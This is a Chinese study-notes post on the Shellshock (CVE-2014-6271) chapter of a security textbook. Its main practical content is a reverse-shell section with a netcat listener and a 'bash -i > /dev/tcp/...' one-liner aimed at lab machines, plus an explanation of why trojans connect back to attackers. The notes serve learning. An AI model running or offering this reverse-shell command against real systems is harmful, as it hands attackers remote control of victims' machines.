Shellshock_Attack

來源:《Computer Security》A Hands-on Approach — Wenliang Du

Chapter03 Shellshock Attack

書上的內容是很好的。這裏僅僅做個學習筆記。

這是實打實的一個以前的漏洞。能復現這個漏洞,感覺還不錯。

這個漏洞修復了,便沒有。所以,這一章節Shellshock Attack 不是重點。reverse shell 是重點。

還有便是要補充PHP與數據庫。

比較尷尬的是,雖然復現了bash的漏洞;單獨使用了反彈shell;但是CGI+bash4.1+reverse shell 並沒有得到復現。

這一章的思路:bash的漏洞介紹 + 符合利用漏洞的CGI + 使用reverse shell


漏洞“破殼”(CVE-2014-6271)分析

網上的文章,已經寫的相當清楚了。

Bash遠程代碼執行漏洞“破殼”(CVE-2014-6271)分析

上面文章的條理性很好。

漏洞的編號+發佈的時間+受影響的平臺及版本+影響範圍+漏洞原理+漏洞驗證方法+漏洞的影響+漏洞的修復。

現在如果想復現這個實驗,可以參考:詳解ShellShock 漏洞復現原理,內附ShellShock的修復方法



CGI 介紹

略。我不懂。可以參考:萬法歸宗——CGIcgi原理



shell 反彈

參考:shell 反彈總結

想要搞清楚這個問題,首先要搞清楚什麼是反彈,爲什麼要反彈。
假設我們攻擊了一臺機器,打開了該機器的一個端口,攻擊者在自己的機器去連接目標機器(目標ip:目標機器端口),這是比較常規的形式,我們叫做正向連接。遠程桌面,web服務,ssh,telnet等等,都是正向連接。

那麼什麼情況下正向連接不太好用了呢?
1.某客戶機中了你的網馬,但是它在局域網內,你直接連接不了。它的ip會動態改變,你不能持續控制。
2.由於防火牆等限制,對方機器只能發送請求,不能接收請求。
3.對於病毒,木馬,受害者什麼時候能中招,對方的網絡環境是什麼樣的,什麼時候開關機,都是未知,所以建立一個服務端,讓惡意程序主動連接,纔是上策。

反彈就很好理解了, 攻擊者指定服務端,受害者主機主動連接攻擊者的服務端程序,就叫反彈連接。

我目前曉得是上面使用的皮毛。

文件描述符與重定向,可以參考:Linux 標準文件描述符

#attack machine :10.0.2.6
#監聽8080端口(可以換個端口,這個端口比較常見)
nc -lvvp 8080
#victim machine :10.0.2.5
# i參數,表示interactiva
# 輸出重定向到/dev/tcp/10.0.2.6/8080
# 輸入重定向到,輸出重定向的設備
# 錯誤輸出重定向到,輸出重定向的設備
bash -i > /dev/tcp/10.0.2.6/8080 0<&1 2>&1

在這裏插入圖片描述在這裏插入圖片描述

參考文章

–漏洞參考:

Bash遠程代碼執行漏洞“破殼”(CVE-2014-6271)分析

詳解ShellShock 漏洞復現原理,內附ShellShock的修復方法

–CGI參考:(沒咋看懂)

萬法歸宗——CGI

cgi原理

–反彈shell:

【技術分享】linux各種一句話反彈shell總結——攻擊者指定服務端,受害者主機(無公網IP)主動連接攻擊者的服務端程序(CC server),開啓一個shell交互,就叫反彈shell。

–其他

在騰訊雲 Ubuntu18.04 安裝配置 MySQL 5.7(踩坑警告⚠️)

Linux 標準文件描述符

CVE-2014-6271

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章